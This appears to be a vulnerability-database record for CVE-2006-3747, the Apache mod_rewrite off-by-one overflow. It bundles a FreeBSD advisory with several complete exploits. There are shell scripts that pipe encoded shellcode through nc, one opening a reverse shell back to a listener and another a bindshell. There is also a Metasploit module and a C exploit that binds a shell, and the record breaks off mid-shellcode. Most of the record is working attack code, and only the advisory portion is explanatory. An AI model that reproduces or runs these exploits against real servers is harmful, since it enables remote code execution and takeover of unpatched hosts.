we will jmp to(NOP),run shellcode from here\n`perl -e 'print \"C\"x10'`%3fC%3f%90\\ \n# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded\n`perl -e 'print \"\\ 
\n\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\\n\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x63\\\n\\x58\\x30\\x42\\x30\\x50\\x42\\x6b\\x42\\x41\\x73\\x42\\x32\\x42\\x41\\x41\\x32\\\n\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x79\\x6c\\x51\\\n\\x7a\\x6a\\x4b\\x50\\x4d\\x4d\\x38\\x6b\\x49\\x79\\x6f\\x49\\x6f\\x6b\\x4f\\x65\\\n\\x30\\x4c\\x4b\\x72\\x4c\\x45\\x74\\x51\\x34\\x4e\\x6b\\x71\\x55\\x77\\x4c\\x6c\\\n\\x4b\\x33\\x4c\\x64\\x45\\x33\\x48\\x64\\x41\\x5a\\x4f\\x4c\\x4b\\x72\\x6f\\x36\\\n\\x78\\x4c\\x4b\\x73\\x6f\\x45\\x70\\x66\\x61\\x4a\\x4b\\x53\\x79\\x4e\\x6b\\x44\\\n\\x74\\x4e\\x6b\\x73\\x31\\x38\\x6e\\x55\\x61\\x79\\x50\\x6c\\x59\\x6c\\x6c\\x4b\\\n\\x34\\x6f\\x30\\x74\\x34\\x34\\x47\\x59\\x51\\x5a\\x6a\\x76\\x6d\\x76\\x61\\x6f\\\n\\x32\\x5a\\x4b\\x79\\x64\\x55\\x6b\\x33\\x64\\x51\\x34\\x41\\x38\\x30\\x75\\x4b\\\n\\x55\\x6e\\x6b\\x33\\x6f\\x44\\x64\\x46\\x61\\x7a\\x4b\\x32\\x46\\x6e\\x6b\\x34\\\n\\x4c\\x42\\x6b\\x6e\\x6b\\x73\\x6f\\x77\\x6c\\x54\\x41\\x58\\x6b\\x43\\x33\\x74\\\n\\x6c\\x6c\\x4b\\x4d\\x59\\x50\\x6c\\x74\\x64\\x75\\x4c\\x52\\x41\\x6f\\x33\\x50\\\n\\x31\\x6b\\x6b\\x72\\x44\\x4c\\x4b\\x50\\x43\\x66\\x50\\x6c\\x4b\\x33\\x70\\x64\\\n\\x4c\\x6c\\x4b\\x74\\x30\\x65\\x4c\\x4e\\x4d\\x4e\\x6b\\x53\\x70\\x47\\x78\\x33\\\n\\x6e\\x51\\x78\\x4c\\x4e\\x52\\x6e\\x56\\x6e\\x58\\x6c\\x50\\x50\\x59\\x6f\\x79\\\n\\x46\\x70\\x66\\x62\\x73\\x75\\x36\\x75\\x38\\x66\\x53\\x64\\x72\\x42\\x48\\x53\\\n\\x47\\x32\\x53\\x50\\x32\\x71\\x4f\\x71\\x44\\x49\\x6f\\x48\\x50\\x52\\x48\\x5a\\\n\\x6b\\x48\\x6d\\x6b\\x4c\\x65\\x6b\\x70\\x50\\x4b\\x4f\\x68\\x56\\x61\\x4f\\x4e\\\n\\x69\\x4a\\x45\\x30\\x66\\x6e\\x61\\x78\\x6d\\x67\\x78\\x73\\x32\\x42\\x75\\x52\\\n\\x4a\\x75\\x52\\x6b\\x4f\\x7a\\x70\\x61\\x78\\x6b\\x69\\x55\\x59\\x6c\\x35\\x6e\\\n\\x4d\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x70\\x53\\x50\\x53\\x56\\x33\\x76\\x33\\x43\\\n\\x73\\x32\\x73\\x31\\x53\\x52\\x73\\x6b\\x4f\\x4a\\x70\\x70\\x68\
\x6f\\x30\\x6d\\\n\\x78\\x35\\x50\\x46\\x61\\x30\\x66\\x30\\x68\\x76\\x64\\x6c\\x42\\x33\\x56\\x70\\\n\\x53\\x4e\\x69\\x78\\x61\\x4c\\x55\\x75\\x38\\x4a\\x4c\\x58\\x79\\x4c\\x6a\\x73\\\n\\x50\\x53\\x67\\x6b\\x4f\\x6a\\x76\\x73\\x5a\\x72\\x30\\x73\\x61\\x53\\x65\\x4b\\\n\\x4f\\x6a\\x70\\x52\\x46\\x31\\x7a\\x52\\x44\\x73\\x56\\x50\\x68\\x51\\x73\\x50\\\n\\x6d\\x32\\x4a\\x62\\x70\\x51\\x49\\x47\\x59\\x6a\\x6c\\x6c\\x49\\x4b\\x57\\x42\\\n\\x4a\\x73\\x74\\x6d\\x59\\x6d\\x32\\x35\\x61\\x6f\\x30\\x48\\x73\\x4f\\x5a\\x6f\\\n\\x65\\x4c\\x49\\x39\\x6d\\x4b\\x4e\\x33\\x72\\x54\\x6d\\x6b\\x4e\\x33\\x72\\x34\\\n\\x6c\\x6c\\x4d\\x50\\x7a\\x57\\x48\\x4e\\x4b\\x4c\\x6b\\x6c\\x6b\\x71\\x78\\x32\\\n\\x52\\x6b\\x4e\\x6c\\x73\\x42\\x36\\x49\\x6f\\x73\\x45\\x65\\x78\\x6b\\x4f\\x6e\\\n\\x36\\x71\\x4b\\x42\\x77\\x43\\x62\\x53\\x61\\x76\\x31\\x70\\x51\\x30\\x6a\\x35\\\n\\x51\\x62\\x71\\x76\\x31\\x72\\x75\\x43\\x61\\x4b\\x4f\\x6e\\x30\\x73\\x58\\x4e\\\n\\x4d\\x7a\\x79\\x37\\x75\\x38\\x4e\\x31\\x43\\x4b\\x4f\\x4a\\x76\\x30\\x6a\\x39\\\n\\x6f\\x6b\\x4f\\x70\\x37\\x6b\\x4f\\x6e\\x30\\x45\\x38\\x39\\x77\\x54\\x39\\x79\\\n\\x56\\x71\\x69\\x79\\x6f\\x53\\x45\\x56\\x64\\x69\\x6f\\x69\\x46\\x6b\\x4f\\x62\\\n\\x57\\x6b\\x4c\\x4b\\x4f\\x6a\\x70\\x50\\x68\\x6a\\x50\\x6f\\x7a\\x37\\x74\\x43\\\n\\x6f\\x72\\x73\\x4b\\x4f\\x6a\\x76\\x79\\x6f\\x38\\x50\\x63\\\n\"'`\\\nHTTP/1.0\\r\\n\\\nHost: $host\\r\\n\\r\\n\" | nc -vv $host 80\n\n# milw0rm.com [2007-04-07]", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache 1.3.372.0.592.2.3 mod_rewrite - Remote Overflow", "edition": 1, "published": "2006-08-21T00:00:00", "title": "Apache 1.3.372.0.592.2.3 mod_rewrite - Remote Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-21T00:00:00", "id": "EXPLOITPACK:8FEEBCD1B617ED74B8D2179061252A44", "href": "", "sourceData": "#!/bin/sh\n# Exploit for Apache mod_rewrite off-by-one.\n# 
Vulnerability discovered by Mark Dowd.\n# CVE-2006-3747\n# \n# by jack <jack\\x40gulcas\\x2Eorg>\n# 2006-08-20\n#\n# Thx to xuso for help me with the shellcode.\n#\n# I suppose that you've the \"RewriteRule kung/(.*) $1\" rule if not\n# you must recalculate adressess.\n#\n# Shellcode is based on Taeho Oh bindshell on port 30464 and modified\n# for avoiding apache url-escape.. Take a look is quite nice ;)\n#\n# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at\n# 0x0834ae77 for any other version/system find it.\n#\n# Gulcas rulez :P\n\necho -e \"mod_rewrite apache off-by-one overflow\"\necho \"by jack <jack\\x40gulcas\\x2eorg>\\n\\n\"\n\nif [ $# -ne 1 ] ; then\n echo \"Usage: $0 webserver\"\n exit\nfi\n\nhost=$1\n\necho -ne \"GET /kung/ldap://localhost/`perl -e 'print \"%90\"x128'`%89%e6\\\n%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\\n%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\\n%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\\n%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\\n%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\\n%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\\n%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\\n%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\\n%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\\nHost: $host\\r\\n\\r\\n\" | nc $host 80\n\n# milw0rm.com [2006-08-21]", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "\nThe Apache Software Foundation and The Apache HTTP Server\n\t Project reports:\n\nAn off-by-one flaw exists in the Rewrite module,\n\t mod_rewrite, as shipped with Apache 1.3 since 1.3.28, 2.0\n\t since 2.0.46, and 2.2 since 2.2.0.\nDepending on the manner in 
which Apache HTTP Server was\n\t compiled, this software defect may result in a\n\t vulnerability which, in combination with certain types of\n\t Rewrite rules in the web server configuration files, could\n\t be triggered remotely. For vulnerable builds, the nature\n\t of the vulnerability can be denial of service (crashing of\n\t web server processes) or potentially allow arbitrary code\n\t execution. This issue has been rated as having important\n\t security impact by the Apache HTTP Server Security Team.\nThis flaw does not affect a default installation of\n\t Apache HTTP Server. Users who do not use, or have not\n\t enabled, the Rewrite module mod_rewrite are not affected\n\t by this issue. This issue only affects installations using\n\t a Rewrite rule with the following characteristics:\n\nThe RewriteRule allows the attacker to control the\n\t initial part of the rewritten URL (for example if the\n\t substitution URL starts with $1)\nThe RewriteRule flags do NOT include any of the\n\t following flags: Forbidden (F), Gone (G), or NoEscape\n\t (NE).\n\nPlease note that ability to exploit this issue is\n\t dependent on the stack layout for a particular compiled\n\t version of mod_rewrite. 
If the compiler used to compile\n\t Apache HTTP Server has added padding to the stack\n\t immediately after the buffer being overwritten, it will\n\t not be possible to exploit this issue, and Apache HTTP\n\t Server will continue operating normally.\nThe Apache HTTP Server project thanks Mark Dowd of McAfee\n\t Avert Labs for the responsible reporting of this\n\t vulnerability.\n\n", "edition": 4, "modified": "2006-11-01T00:00:00", "published": "2006-07-27T00:00:00", "id": "DC8C08C7-1E7C-11DB-88CF-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html", "title": "apache -- mod_rewrite buffer overflow vulnerability", "type": "freebsd", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:04", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Apache module mod_rewrite LDAP protocol Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83108", "href": "https://packetstormsecurity.com/files/83108/Apache-module-mod_rewrite-LDAP-protocol-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow', \n'Description' => %q{ \nThis module exploits the mod_rewrite LDAP protocol scheme handling \nflaw discovered by Mark Dowd, which produces an off-by-one overflow. \nApache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. 
\nThis module requires REWRITEPATH to be set accurately. In addition, \nthe target must have 'RewriteEngine on' configured, with a specific \n'RewriteRule' condition enabled to allow for exploitation. \n \nThe flaw affects multiple platforms, however this module currently \nonly supports Windows based installations. \n}, \n'Author' => 'patrick', \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2006-3747' ], \n[ 'OSVDB', '27588' ], \n[ 'BID', '19204' ], \n[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/3680' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/3996' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/2237' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Platform' => ['win'], # 'linux'], \n'Payload' => \n{ \n'Space' => 636, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n'StackAdjustment' => -3500, \n'DisableNops' => 'True', \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ], # patrickw tested OK 20090310 win32 \n], \n'DisclosureDate' => 'Jul 28 2006', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('REWRITEPATH', [true, \"The mod_rewrite URI path\", \"rewrite_path\"]), \n], self.class) \nend \n \ndef autofilter \nreturn false \nend \n \ndef check \nres = send_request_raw({ \n'uri' => '/', \n'version' => '1.1', \n}, 2) \n \nif (res.to_s =~ /Apache/) # This could be smarter. \nreturn Exploit::CheckCode::Detected \nend \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \n# On Linux Apache, it is possible to overwrite EIP by \n# sending ldap://<buf> ... 
TODO patrickw \n \ntrigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90' \n \nprint_status(\"Sending payload.\") \nsend_request_raw({ \n'uri' => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded, \n'version' => '1.0', \n}, 2) \nhandler \nend \nend \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83108/apache_mod_rewrite_ldap.rb.txt"}, {"lastseen": "2016-12-05T22:18:10", "description": "", "published": "2007-04-07T00:00:00", "type": "packetstorm", "title": "modrewrite-offbyone.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-04-07T00:00:00", "id": "PACKETSTORM:55727", "href": "https://packetstormsecurity.com/files/55727/modrewrite-offbyone.txt.html", "sourceData": "`#!/bin/sh \n# Exploit for Apache mod_rewrite off-by-one(Win32). \n# \n# by axis <axis@ph4nt0m> \n# http://www.ph4nt0m.org \n# 2007-04-06 \n# \n# Tested on Apache 2.0.58 (Win32) \n# Windows2003 CN SP1 \n# \n# Vulnerable Apache Versions: \n# * 1.3 branch: >1.3.28 and <1.3.37 \n# * 2.0 branch: >2.0.46 and <2.0.59 \n# * 2.2 branch: >2.2.0 and <2.2.3 \n# \n# \n# Vulnerability discovered by Mark Dowd. \n# CVE-2006-3747 \n# \n# first POC by jack <jack\\x40gulcas\\x2Eorg> \n# 2006-08-20 \n# http://www.milw0rm.com/exploits/2237 \n# \n# \n# \n# to successfully exploit the vuln,there are some conditions \n# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html \n# \n# \n# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat \n# \n# for more details about the vuln please see: \n# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded \n# \n# \n# no opcodes needed under windows! 
\n# it will directly run our shellcode \n# \n# my apache config file \n# [httpd.conf]: \n# RewriteEngine on \n# RewriteRule 1/(.*) $1 \n# RewriteLog \"logs/rewrite.log\" \n# RewriteLogLevel 3 \n# \n# \n# Usage: \n# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141 \n# mod_rewrite apache off-by-one overflow \n# \n# [axis@opensystemX axis]$ nc -vv -n -l -p 1154 \n# listening on [any] 1154 ... \n# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077 \n# Microsoft Windows [?? 5.2.3790] \n# (C) ??D 1985-2003 Microsoft Corp. \n# \n# D:\\Apache\\Apache2>exit \n# exit \n# sent 5, rcvd 100 \n# \n# \n# \n# shellcode badchar\u00f5\u00f4 \n# badchar 0x3f 0x0b shellcode \n# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b \n# \n \n \necho -e \"mod_rewrite apache off-by-one overflow\" \n \n \nif [ $# -ne 1 ] ; then \necho \"Usage: $0 webserver\" \nexit \nfi \n \nhost=$1 \n \n#use ldap:// to trigger the vuln, \"Ph4nt0m\" is any arbitrary string \necho -ne \"GET /1/ldap://ph4nt0m/`perl -e 'print \"Ph4nt0m\"x5'`\\ \n# %3f to trigger the vuln \n%3fA%3fA%3f\\ \n#string \"CCCC..\" is any arbitrary string, use %3f to trigger the vuln \n#%90 is the machine code we will jmp to(NOP),run shellcode from here \n`perl -e 'print \"C\"x10'`%3fC%3f%90\\ \n# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded \n`perl -e 'print \"\\ \n\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\ \n\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x63\\ \n\\x58\\x30\\x42\\x30\\x50\\x42\\x6b\\x42\\x41\\x73\\x42\\x32\\x42\\x41\\x41\\x32\\ \n\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x79\\x6c\\x51\\ \n\\x7a\\x6a\\x4b\\x50\\x4d\\x4d\\x38\\x6b\\x49\\x79\\x6f\\x49\\x6f\\x6b\\x4f\\x65\\ \n\\x30\\x4c\\x4b\\x72\\x4c\\x45\\x74\\x51\\x34\\x4e\\x6b\\x71\\x55\\x77\\x4c\\x6c\\ \n\\x4b\\x33\\x4c\\x64\\x45\\x33\\x48\\x64\\x41\\x5a\\x4f\\x4c\\x4b\\x72\\x6f\\x36\\ 
\n\\x78\\x4c\\x4b\\x73\\x6f\\x45\\x70\\x66\\x61\\x4a\\x4b\\x53\\x79\\x4e\\x6b\\x44\\ \n\\x74\\x4e\\x6b\\x73\\x31\\x38\\x6e\\x55\\x61\\x79\\x50\\x6c\\x59\\x6c\\x6c\\x4b\\ \n\\x34\\x6f\\x30\\x74\\x34\\x34\\x47\\x59\\x51\\x5a\\x6a\\x76\\x6d\\x76\\x61\\x6f\\ \n\\x32\\x5a\\x4b\\x79\\x64\\x55\\x6b\\x33\\x64\\x51\\x34\\x41\\x38\\x30\\x75\\x4b\\ \n\\x55\\x6e\\x6b\\x33\\x6f\\x44\\x64\\x46\\x61\\x7a\\x4b\\x32\\x46\\x6e\\x6b\\x34\\ \n\\x4c\\x42\\x6b\\x6e\\x6b\\x73\\x6f\\x77\\x6c\\x54\\x41\\x58\\x6b\\x43\\x33\\x74\\ \n\\x6c\\x6c\\x4b\\x4d\\x59\\x50\\x6c\\x74\\x64\\x75\\x4c\\x52\\x41\\x6f\\x33\\x50\\ \n\\x31\\x6b\\x6b\\x72\\x44\\x4c\\x4b\\x50\\x43\\x66\\x50\\x6c\\x4b\\x33\\x70\\x64\\ \n\\x4c\\x6c\\x4b\\x74\\x30\\x65\\x4c\\x4e\\x4d\\x4e\\x6b\\x53\\x70\\x47\\x78\\x33\\ \n\\x6e\\x51\\x78\\x4c\\x4e\\x52\\x6e\\x56\\x6e\\x58\\x6c\\x50\\x50\\x59\\x6f\\x79\\ \n\\x46\\x70\\x66\\x62\\x73\\x75\\x36\\x75\\x38\\x66\\x53\\x64\\x72\\x42\\x48\\x53\\ \n\\x47\\x32\\x53\\x50\\x32\\x71\\x4f\\x71\\x44\\x49\\x6f\\x48\\x50\\x52\\x48\\x5a\\ \n\\x6b\\x48\\x6d\\x6b\\x4c\\x65\\x6b\\x70\\x50\\x4b\\x4f\\x68\\x56\\x61\\x4f\\x4e\\ \n\\x69\\x4a\\x45\\x30\\x66\\x6e\\x61\\x78\\x6d\\x67\\x78\\x73\\x32\\x42\\x75\\x52\\ \n\\x4a\\x75\\x52\\x6b\\x4f\\x7a\\x70\\x61\\x78\\x6b\\x69\\x55\\x59\\x6c\\x35\\x6e\\ \n\\x4d\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x70\\x53\\x50\\x53\\x56\\x33\\x76\\x33\\x43\\ \n\\x73\\x32\\x73\\x31\\x53\\x52\\x73\\x6b\\x4f\\x4a\\x70\\x70\\x68\\x6f\\x30\\x6d\\ \n\\x78\\x35\\x50\\x46\\x61\\x30\\x66\\x30\\x68\\x76\\x64\\x6c\\x42\\x33\\x56\\x70\\ \n\\x53\\x4e\\x69\\x78\\x61\\x4c\\x55\\x75\\x38\\x4a\\x4c\\x58\\x79\\x4c\\x6a\\x73\\ \n\\x50\\x53\\x67\\x6b\\x4f\\x6a\\x76\\x73\\x5a\\x72\\x30\\x73\\x61\\x53\\x65\\x4b\\ \n\\x4f\\x6a\\x70\\x52\\x46\\x31\\x7a\\x52\\x44\\x73\\x56\\x50\\x68\\x51\\x73\\x50\\ \n\\x6d\\x32\\x4a\\x62\\x70\\x51\\x49\\x47\\x59\\x6a\\x6c\\x6c\\x49\\x4b\\x57\\x42\\ \n\\x4a\\x73\\x74\\x6d\\x59\\x6d\\x32\\x35\\x61\\x6f\\x30\\x48\\x73\\x4f\\x5a\\x6f\\ 
\n\\x65\\x4c\\x49\\x39\\x6d\\x4b\\x4e\\x33\\x72\\x54\\x6d\\x6b\\x4e\\x33\\x72\\x34\\ \n\\x6c\\x6c\\x4d\\x50\\x7a\\x57\\x48\\x4e\\x4b\\x4c\\x6b\\x6c\\x6b\\x71\\x78\\x32\\ \n\\x52\\x6b\\x4e\\x6c\\x73\\x42\\x36\\x49\\x6f\\x73\\x45\\x65\\x78\\x6b\\x4f\\x6e\\ \n\\x36\\x71\\x4b\\x42\\x77\\x43\\x62\\x53\\x61\\x76\\x31\\x70\\x51\\x30\\x6a\\x35\\ \n\\x51\\x62\\x71\\x76\\x31\\x72\\x75\\x43\\x61\\x4b\\x4f\\x6e\\x30\\x73\\x58\\x4e\\ \n\\x4d\\x7a\\x79\\x37\\x75\\x38\\x4e\\x31\\x43\\x4b\\x4f\\x4a\\x76\\x30\\x6a\\x39\\ \n\\x6f\\x6b\\x4f\\x70\\x37\\x6b\\x4f\\x6e\\x30\\x45\\x38\\x39\\x77\\x54\\x39\\x79\\ \n\\x56\\x71\\x69\\x79\\x6f\\x53\\x45\\x56\\x64\\x69\\x6f\\x69\\x46\\x6b\\x4f\\x62\\ \n\\x57\\x6b\\x4c\\x4b\\x4f\\x6a\\x70\\x50\\x68\\x6a\\x50\\x6f\\x7a\\x37\\x74\\x43\\ \n\\x6f\\x72\\x73\\x4b\\x4f\\x6a\\x76\\x79\\x6f\\x38\\x50\\x63\\ \n\"'`\\ \nHTTP/1.0\\r\\n\\ \nHost: $host\\r\\n\\r\\n\" | nc -vv $host 80 \n \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/55727/modrewrite-offbyone.txt"}, {"lastseen": "2016-12-05T22:20:53", "description": "", "published": "2007-05-31T00:00:00", "type": "packetstorm", "title": "apache2058-rewrite.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-05-31T00:00:00", "id": "PACKETSTORM:56989", "href": "https://packetstormsecurity.com/files/56989/apache2058-rewrite.txt.html", "sourceData": "`/* \napache mod rewrite exploit (win32) \n \nBy: fabio/b0x (oc-192, old CoTS member) \n \nVuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded \n \nCode: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003) \noriginal exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also \nwas a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/ \n \nUsage: ./apache hostname rewrite_path \n \nGreetings: caffeine, raver, 
psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard \n \nExample: ./apache 192.168.0.253 test \n[+]Preparing payload \n[+]Connecting... \n[+]Connected \n[+]Sending... \n[+]Sent \n[+]Starting second stage... \n[+]Connecting... \n[+]Connected \n[+]Sending... \n[+]Sent \n[+]Connecting to shell \nMicrosoft Windows [Version 5.2.3790] \n(C) Copyright 1985-2003 Microsoft Corp. \n \nC:\\Program Files\\Apache Group\\Apache2>exit \nexit \n[+]Owned \n*/ \n#include <stdio.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <errno.h> \n#include <string.h> \n#include <netdb.h> \n#include <sys/types.h> \n#include <netinet/in.h> \n#include <sys/socket.h> \n \n#define PORT 80 \n#define PORT2 4444 \n#define MAXDATASIZE 1024 \nchar get[] = \"/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90\"; \nchar shellcode[]= \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\" \n\"\\x48\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x41\" \n\"\\x58\\x50\\x30\\x42\\x30\\x41\\x6b\\x41\\x41\\x51\\x41\\x32\\x41\\x41\\x32\\x42\" \n\"\\x42\\x42\\x30\\x42\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x7a\\x49\\x4b\\x58\\x56\" \n\"\\x36\\x73\\x30\\x43\\x30\\x75\\x50\\x70\\x53\\x66\\x35\\x70\\x56\\x31\\x47\\x4c\" \n\"\\x4b\\x50\\x6c\\x44\\x64\\x55\\x48\\x6c\\x4b\\x73\\x75\\x75\\x6c\\x4c\\x4b\\x61\" \n\"\\x44\\x73\\x35\\x63\\x48\\x35\\x51\\x4b\\x5a\\x6c\\x4b\\x50\\x4a\\x37\\x68\\x6c\" \n\"\\x4b\\x42\\x7a\\x77\\x50\\x37\\x71\\x4a\\x4b\\x6b\\x53\\x44\\x72\\x30\\x49\\x6e\" \n\"\\x6b\\x44\\x74\\x6e\\x6b\\x56\\x61\\x68\\x6e\\x54\\x71\\x39\\x6f\\x6b\\x4c\\x70\" \n\"\\x31\\x4b\\x70\\x6c\\x6c\\x67\\x48\\x6b\\x50\\x54\\x34\\x53\\x37\\x6b\\x71\\x68\" \n\"\\x4f\\x44\\x4d\\x73\\x31\\x78\\x47\\x38\\x6b\\x38\\x72\\x45\\x6b\\x73\\x4c\\x31\" \n\"\\x34\\x46\\x74\\x52\\x55\\x6b\\x51\\x6c\\x4b\\x63\\x6a\\x65\\x74\\x56\\x61\\x7a\" \n\"\\x4b\\x32\\x46\\x4c\\x4b\\x76\\x6c\\x70\\x4b\\x4e\\x6b\\x30\\x5a\\x75\\x4c\\x67\" 
\n\"\\x71\\x5a\\x4b\\x6e\\x6b\\x74\\x44\\x4e\\x6b\\x57\\x71\\x6b\\x58\\x68\\x6b\\x76\" \n\"\\x62\\x50\\x31\\x4b\\x70\\x33\\x6f\\x53\\x6e\\x31\\x4d\\x63\\x6b\\x4b\\x72\\x65\" \n\"\\x58\\x55\\x50\\x61\\x4e\\x31\\x7a\\x36\\x50\\x42\\x79\\x70\\x64\\x4e\\x6b\\x74\" \n\"\\x59\\x6e\\x6b\\x43\\x6b\\x44\\x4c\\x4c\\x4b\\x51\\x4b\\x77\\x6c\\x4c\\x4b\\x35\" \n\"\\x4b\\x6e\\x6b\\x31\\x4b\\x74\\x48\\x73\\x63\\x63\\x58\\x6c\\x4e\\x70\\x4e\\x44\" \n\"\\x4e\\x78\\x6c\\x79\\x6f\\x4b\\x66\\x4d\\x59\\x6f\\x37\\x4b\\x31\\x78\\x6c\\x33\" \n\"\\x30\\x77\\x71\\x73\\x30\\x47\\x70\\x36\\x37\\x53\\x66\\x51\\x43\\x4d\\x59\\x69\" \n\"\\x75\\x39\\x78\\x56\\x47\\x57\\x70\\x37\\x70\\x37\\x70\\x6e\\x70\\x45\\x51\\x33\" \n\"\\x30\\x37\\x70\\x4c\\x76\\x72\\x39\\x55\\x48\\x7a\\x47\\x6d\\x74\\x45\\x49\\x54\" \n\"\\x30\\x4d\\x39\\x38\\x65\\x77\\x39\\x4b\\x36\\x50\\x49\\x6c\\x64\\x35\\x4a\\x52\" \n\"\\x50\\x4f\\x37\\x6c\\x64\\x4c\\x6d\\x76\\x4e\\x4d\\x39\\x4b\\x69\\x45\\x59\\x49\" \n\"\\x65\\x4e\\x4d\\x78\\x4b\\x4a\\x4d\\x6b\\x4c\\x77\\x4b\\x31\\x47\\x50\\x53\\x74\" \n\"\\x72\\x61\\x4f\\x46\\x53\\x67\\x42\\x57\\x70\\x61\\x4b\\x6c\\x4d\\x42\\x6b\\x75\" \n\"\\x70\\x70\\x51\\x6b\\x4f\\x7a\\x77\\x4b\\x39\\x4b\\x6f\\x4f\\x79\\x4f\\x33\\x4e\" \n\"\\x6d\\x71\\x65\\x52\\x34\\x53\\x5a\\x53\\x37\\x30\\x59\\x50\\x51\\x66\\x33\\x4b\" 